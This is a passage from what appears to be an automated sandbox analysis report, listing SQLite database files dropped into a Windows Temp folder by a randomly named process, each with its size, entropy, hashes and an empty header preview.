                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\0vuuY2MyBF

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):126976
                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\0yIswN7bbT

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\12ujhv05sv

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):126976
                                                                                                                                        Entropy (8bit):0.47147045728725767
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                        MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                        SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                        SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                        SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\15oRj0KWLx

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):28672
                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\1AaVNCQHBw

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\1CxHZ4ANT5

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\1aNtQljwqX

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):28672
                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\1iGEox8LJK

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\1sVyeNfTY7

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):49152
                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\2DJ3PvnTqj

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\2I13nuo1A7

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):49152
                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\2QVPVNisyL

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):28672
                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\2SIXq7CJTQ

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):159744
                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\2WFc4bhOAJ

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):159744
                                                                                                                                        Entropy (8bit):0.7873599747470391
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                        MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                        SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                        SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                        SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\2njwmA4Bkr

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\3RetWEFJJL

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):49152
                                                                                                                                        Entropy (8bit):0.8180424350137764
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                        MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\3uIav5zFmx

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\48sPQOISBj

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):40960
                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\4DRL9HF3xs

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):106496
                                                                                                                                        Entropy (8bit):1.1358696453229276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\4OG9vfhu1q

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):114688
                                                                                                                                        Entropy (8bit):0.9746603542602881
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\4YYRSIMJXk

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):28672
                                                                                                                                        Entropy (8bit):2.5793180405395284
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                        C:\Users\user\AppData\Local\Temp\4lhwY6gxHH

                                                                                                                                        Download File
                                                                                                                                        Process:C:\Recovery\psSFLznncXozWndMhTDdwutNn.exe
